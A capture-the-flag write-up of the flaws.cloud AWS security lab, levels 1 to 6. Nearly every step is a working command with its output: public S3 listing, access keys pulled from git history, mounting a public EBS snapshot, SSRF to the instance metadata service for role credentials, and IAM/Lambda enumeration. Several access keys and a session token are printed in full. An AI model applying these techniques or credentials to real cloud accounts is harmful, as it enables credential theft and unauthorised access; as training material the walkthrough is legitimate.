flaws.cloud
Level 1
DNS enum:
$ dig +nocmd flaws.cloud
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 46135
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;flaws.cloud. IN A
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.176.234
;; Query time: 64 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Sat Aug 28 16:30:43 +0630 2021
;; MSG SIZE rcvd: 56
$ nslookup 52.218.176.234
234.176.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
Authoritative answers can be found from:
Request s3:
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
2017-03-14 09:30:38 2575 hint1.html
2017-03-03 10:35:17 1707 hint2.html
2017-03-03 10:35:11 1101 hint3.html
2020-05-23 00:46:45 3162 index.html
2018-07-10 23:17:16 15979 logo.png
2017-02-27 08:29:28 46 robots.txt
2017-02-27 08:29:30 1051 secret-dd02c7c.html
Level 2:
http://flaws.cloud/secret-dd02c7c.html
# http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/
Level 2
Link - http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/
Create simple user and you will get access key id and access key.
https://console.aws.amazon.com/iam/home#/users$new?step=final&accessKey&userNames=test123
This is my Access key id and key. I copy that.
AKIAUFZUUPCWBRVSKK5L
hePWL07ve1b12e6LNS1iva4nMWJbVzp/qWnrROyo
When i access s3 bucket. I get permission error.
% aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
Create a profile with id and key.
% aws configure --profile liv-test
AWS Access Key ID [None]: AKIAUFZUUPCWBRVSKK5L
AWS Secret Access Key [None]: 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
Default region name [None]:
Default output format [None]:
% aws configure list --profile liv-test
Name Value Type Location
---- ----- ---- --------
profile liv-test manual --profile
access_key ****************KK5L shared-credentials-file
secret_key ****************ROyo shared-credentials-file
region <not set> None None
Don't forget to create group and add user to this group. Now you can request s3 with this profile.
% aws s3 --profile liv-test ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-27 08:32:15 80751 everyone.png
2017-03-03 10:17:17 1433 hint1.html
2017-02-27 08:34:39 1035 hint2.html
2017-02-27 08:32:14 2786 index.html
2017-02-27 08:32:14 26 robots.txt
2017-02-27 08:32:15 1051 secret-e4443fc.html
You will get level 3 link.
http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html
# http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/
Level 3
Link - http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/
First request s3 bucket.
% aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --no-sign-request
PRE .git/
2017-02-27 06:44:33 123637 authenticated_users.png
2017-02-27 06:44:34 1552 hint1.html
2017-02-27 06:44:34 1426 hint2.html
2017-02-27 06:44:35 1247 hint3.html
2017-02-27 06:44:33 1035 hint4.html
2020-05-23 00:51:10 1861 index.html
2017-02-27 06:44:33 26 robots.txt
Download all this files.
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request
You will see .git directory and commit history.
% git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:43 2017 -0600
Oops, accidentally added something I shouldn't have
commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:07 2017 -0600
first commit
(END)
View first commit history. You will see access id and key.
% git show b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 <scott@summitroute.com>
Date: Sun Sep 17 09:10:43 2017 -0600
Oops, accidentally added something I shouldn't have
diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ366LIPB4IJKT7SA
-secret_access_key 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
Create a profile with this key.
% aws configure --profile level3
AWS Access Key ID [None]: AKIAJ366LIPB4IJKT7SA
AWS Secret Access Key [None]: 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
Default region name [None]:
Default output format [None]:
% aws s3 --profile level3 ls
2017-02-13 04:01:07 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
2017-05-29 23:04:53 config-bucket-975426262029
2017-02-13 02:33:24 flaws-logs
2017-02-05 10:10:07 flaws.cloud
2017-02-24 08:24:13 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-27 00:45:44 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
2017-02-27 00:46:06 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
2017-02-27 02:14:51 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
2017-02-27 02:17:58 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
2017-02-27 02:36:32 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud
Level 4
Link - http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
Get id by using level3 key.
% aws --profile level3 sts get-caller-identity
{
"UserId": "AIDAJQ3H5DC3LEG2BKSLC",
"Account": "975426262029",
"Arn": "arn:aws:iam::975426262029:user/backup"
}
View all snapshots.
% aws --profile level3 ec2 describe-snapshots --owner-id 975426262029
You must specify a region. You can also configure your region by running "aws configure".
No problem. We know that region from level1.
% aws --profile level3 ec2 describe-snapshots --owner-id 975426262029 --region us-west-2
{
"Snapshots": [
{
"Description": "",
"Encrypted": false,
"OwnerId": "975426262029",
"Progress": "100%",
"SnapshotId": "snap-0b49342abd1bdcb89",
"StartTime": "2017-02-28T01:35:12.000Z",
"State": "completed",
"VolumeId": "vol-04f1c039bc13ea950",
"VolumeSize": 8,
"Tags": [
{
"Key": "Name",
"Value": "flaws backup 2017.02.27"
}
]
}
]
}
Check the permission of snapshot.
% aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile level3 --region us-west-2
{
"CreateVolumePermissions": [
{
"Group": "all"
}
],
"SnapshotId": "snap-0b49342abd1bdcb89"
}
Create volume with this snapshot.
% aws ec2 --profile liv-test create-volume --region us-west-2 --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
{
"AvailabilityZone": "us-west-2a",
"CreateTime": "2021-08-28T21:45:27.000Z",
"Encrypted": false,
"Size": 8,
"SnapshotId": "snap-0b49342abd1bdcb89",
"State": "creating",
"VolumeId": "vol-0e621fe2ba72e7433",
"Iops": 100,
"Tags": [],
"VolumeType": "gp2",
"MultiAttachEnabled": false
}
View Public ip.
% aws ec2 describe-instances --query "Reservations[*].Instances[*].PublicIpAddress" --output=text --profile level3 --region us-west-2
35.165.182.7
Create EC2. In volume tap search snapshots with 0b49342abd1bdcb89 and /dev/sdf. Login to the ec2 instance using ssh key.
% mv ~/Downloads/hnl.pem .
% chmod 600 hnl.pem
% ssh -i hnl.pem ubuntu@34.211.97.131
The authenticity of host '34.211.97.131 (34.211.97.131)' can't be established.
ECDSA key fingerprint is SHA256:pETgClWtWrlnIsvDIJxzbDKkGXClHY7FCjaXjJN084A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '34.211.97.131' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1045-aws x86_64)
List all block devices. We know that snapshots is mount in xvdf.
ubuntu@ip-172-31-60-33:~$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
loop0 7:0 0 33.3M 1 loop /snap/amazon-ssm-agent/3552
loop1 7:1 0 55.5M 1 loop /snap/core18/1997
loop2 7:2 0 70.4M 1 loop /snap/lxd/19647
loop3 7:3 0 32.3M 1 loop /snap/snapd/11588
xvda 202:0 0 8G 0 disk
└─xvda1 202:1 0 8G 0 part /
xvdf 202:80 0 8G 0 disk
└─xvdf1 202:81 0 8G 0 part
ubuntu@ip-172-31-60-33:~$ sudo -i
root@ip-172-31-60-33:~# sudo mkdir /mnt/flaws
root@ip-172-31-60-33:~# sudo mount /dev/xvdf1 /mnt/flaws
oot@ip-172-31-60-33:~# cd /mnt/flaws
root@ip-172-31-60-33:/mnt/flaws# ls
bin dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old
boot etc initrd.img lib lost+found mnt proc run snap sys usr vmlinuz
root@ip-172-31-60-33:/mnt/flaws# cat etc/nginx/.htpasswd
flaws:$apr1$4ed/7TEL$cJnixIRA6P4H8JDvKVMku0
root@ip-172-31-60-33:/mnt/flaws# cd home/ubuntu/
root@ip-172-31-60-33:/mnt/flaws/home/ubuntu# ls
meta-data setupNginx.sh
root@ip-172-31-60-33:/mnt/flaws/home/ubuntu# cat setupNginx.sh
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
You will get the level5 link.
http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/
Level 5
Link - http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/
Request via 169.254.169.254
% curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
{
"Code" : "Success",
"LastUpdated" : "2021-08-29T02:41:10Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA6GG7PSQGT456HE65",
"SecretAccessKey" : "SYGydiwEug0lTorDP5PHq9ZsUcxcsB3uARhJHs7B",
"Token" : "IQoJb3JpZ2luX2VjEGMaCXVzLXdlc3QtMiJHMEUCIQDK+WToeB+NGzdOY17DSv8O4F8n3eOHxJW/plep2Z0FCgIgCvPCnthTloGfwWgJctQSvAwv6DiMPnRb11Rb8vsRgggqgwQInP//////////ARACGgw5NzU0MjYyNjIwMjkiDJ1HIH85ZrK+CC1ccCrXA/Ilw0avQMFN7XvGtN7Nfaiktvvh/QD0T4Qd1g+VUVtv7ewN9ibPaOKehprcDPIDkrbtKWWT9kgtVZnD7OppLpN4/2vMm5gm8GsmHTCqsPw4xUgNX89oZsZ1sLDC74Kn/Cvo152w9YJybJr/A7xwgIGqyLk7J9ookpS4vqNeFDoDo/IFHarZrbwSRBDbOM9848EMDnAshXYM5IwKOfM8fB1brzQimuwHl0qepujIxBt3nVZiEsg4Aq+beFp3DzYU4AaMScLQVNjJIaG7pscQg7ZvTgvXodSRGBv4+W98bV7/Ais7kWSrXsQC0VIzop31HDU0/icy/QD5pe13vkB8CQK2YqKOiUDW/jOhS0pGbHFI3fN0YQIZXgfGaHLHO4Wz4l6YQiI6oa24xI4ZTwpvFcDjrydPqhrla0l/laeexHKoVDkecFUlwq6pQb/IaH1Kn1cI3hgW0PwY+vn28xq6gCXcX0uGvzX9H8EL8NrzUbecy9SNRLIIsTjshU03Y0eDtjVeCL1hvBhZnfysfrTaGNSwYb+jYyGA43LjZDz9AxMVwQHk78PDILkgu3j27p2YZdDSRwrLN52vuw8RcVZLtLPC8wMvLZVNfszN87VeaFbL5WYwEmiZfDDe56uJBjqlAUerBhoKg4ebyAG4fRrG6mGxMVGVHLyV8bcFW93oikrwjyLKYgqfx/raV30+GhLv5U+EmxP4NlaKYlIVf/NH2l1dpb/2cDpZHkq5Zfg/VeOgRr/GBbSiYm69nzODo3H9xr8IPNhJPmKk+KHmgHlPMjulx2yatGIiBEQCnQ/1q1osHm3Xp9WrhD3vwqS+wiOwpczE2jdS9mqxPFGUyKI1h5l22iZAMg==",
"Expiration" : "2021-08-29T08:51:15Z"
}
Setup Credential in /.aws/credentials.
% cat ~/.aws/credentials
[level5]
aws_access_key_id = ASIA6GG7PSQGT456HE65
aws_secret_access_key = SYGydiwEug0lTorDP5PHq9ZsUcxcsB3uARhJHs7B
aws_session_token = IQoJb3JpZ2luX2VjEGMaCXVzLXdlc3QtMiJHMEUCIQDK+WToeB+NGzdOY17DSv8O4F8n3eOHxJW/plep2Z0FCgIgCvPCnthTloGfwWgJctQSvAwv6DiMPnRb11Rb8vsRgggqgwQInP//////////ARACGgw5NzU0MjYyNjIwMjkiDJ1HIH85ZrK+CC1ccCrXA/Ilw0avQMFN7XvGtN7Nfaiktvvh/QD0T4Qd1g+VUVtv7ewN9ibPaOKehprcDPIDkrbtKWWT9kgtVZnD7OppLpN4/2vMm5gm8GsmHTCqsPw4xUgNX89oZsZ1sLDC74Kn/Cvo152w9YJybJr/A7xwgIGqyLk7J9ookpS4vqNeFDoDo/IFHarZrbwSRBDbOM9848EMDnAshXYM5IwKOfM8fB1brzQimuwHl0qepujIxBt3nVZiEsg4Aq+beFp3DzYU4AaMScLQVNjJIaG7pscQg7ZvTgvXodSRGBv4+W98bV7/Ais7kWSrXsQC0VIzop31HDU0/icy/QD5pe13vkB8CQK2YqKOiUDW/jOhS0pGbHFI3fN0YQIZXgfGaHLHO4Wz4l6YQiI6oa24xI4ZTwpvFcDjrydPqhrla0l/laeexHKoVDkecFUlwq6pQb/IaH1Kn1cI3hgW0PwY+vn28xq6gCXcX0uGvzX9H8EL8NrzUbecy9SNRLIIsTjshU03Y0eDtjVeCL1hvBhZnfysfrTaGNSwYb+jYyGA43LjZDz9AxMVwQHk78PDILkgu3j27p2YZdDSRwrLN52vuw8RcVZLtLPC8wMvLZVNfszN87VeaFbL5WYwEmiZfDDe56uJBjqlAUerBhoKg4ebyAG4fRrG6mGxMVGVHLyV8bcFW93oikrwjyLKYgqfx/raV30+GhLv5U+EmxP4NlaKYlIVf/NH2l1dpb/2cDpZHkq5Zfg/VeOgRr/GBbSiYm69nzODo3H9xr8IPNhJPmKk+KHmgHlPMjulx2yatGIiBEQCnQ/1q1osHm3Xp9WrhD3vwqS+wiOwpczE2jdS9mqxPFGUyKI1h5l22iZAMg==
% aws configure list --profile level5
Name Value Type Location
---- ----- ---- --------
profile level5 manual --profile
access_key ****************HE65 shared-credentials-file
secret_key ****************Hs7B shared-credentials-file
region <not set> None None
% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
PRE ddcc78ff/
2017-02-27 08:41:07 871 index.html
Request s3 bucket:
% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
PRE ddcc78ff/
2017-02-27 08:41:07 871 index.html
% aws --profile level5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
2017-03-03 11:06:23 2463 hint1.html
2017-03-03 11:06:23 2080 hint2.html
2020-05-23 01:12:20 2924 index.html
Level 6
Access key ID: AKIAJFQ6E7BY57Q3OBGA Secret: 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
Configure credentials in /.aws/credentials
% cat ~/.aws/credentials
[level6]
aws_access_key_id = AKIAJFQ6E7BY57Q3OBGA
aws_secret_access_key = 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
Get iam-user info:
% aws --profile level6 iam get-user
{
"User": {
"Path": "/",
"UserName": "Level6",
"UserId": "AIDAIRMDOSCWGLCDWOG6A",
"Arn": "arn:aws:iam::975426262029:user/Level6",
"CreateDate": "2017-02-26T23:11:16Z"
}
}
Get policies info (MySecurityAudit is default):
% aws --profile level6 iam list-attached-user-policies --user-name Level6
{
"AttachedPolicies": [
{
"PolicyName": "list_apigateways",
"PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
},
{
"PolicyName": "MySecurityAudit",
"PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
},
{
"PolicyName": "AWSCompromisedKeyQuarantine",
"PolicyArn": "arn:aws:iam::aws:policy/AWSCompromisedKeyQuarantine"
}
]
}
Get list_apigateways info (ARN Amazon Resource Name):
% aws --profile level6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
{
"Policy": {
"PolicyName": "list_apigateways",
"PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
"Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
"Path": "/",
"DefaultVersionId": "v4",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "List apigateways",
"CreateDate": "2017-02-20T01:45:17Z",
"UpdateDate": "2017-02-20T01:48:17Z"
}
}
Get detail about version:
% aws --profile level6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"apigateway:GET"
],
"Effect": "Allow",
"Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
}
]
},
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2017-02-20T01:48:17Z"
}
}
Get all lambda function:
% aws --region us-west-2 --profile level6 lambda list-functions
{
"Functions": [
{
"FunctionName": "Level6",
"FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
"Runtime": "python2.7",
"Role": "arn:aws:iam::975426262029:role/service-role/Level6",
"Handler": "lambda_function.lambda_handler",
"CodeSize": 282,
"Description": "A starter AWS Lambda function.",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2017-02-27T00:24:36.054+0000",
"CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b",
"PackageType": "Zip"
}
]
}
% aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
"RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b"
}
s33ppypa75 is rest-api id.
% aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
{
"item": [
{
"deploymentId": "8gppiv",
"stageName": "Prod",
"cacheClusterEnabled": false,
"cacheClusterStatus": "NOT_AVAILABLE",
"methodSettings": {},
"tracingEnabled": false,
"createdDate": 1488155168,
"lastUpdatedDate": 1488155168
}
]
}
Final Link
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
# "Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"
Last updated
Was this helpful?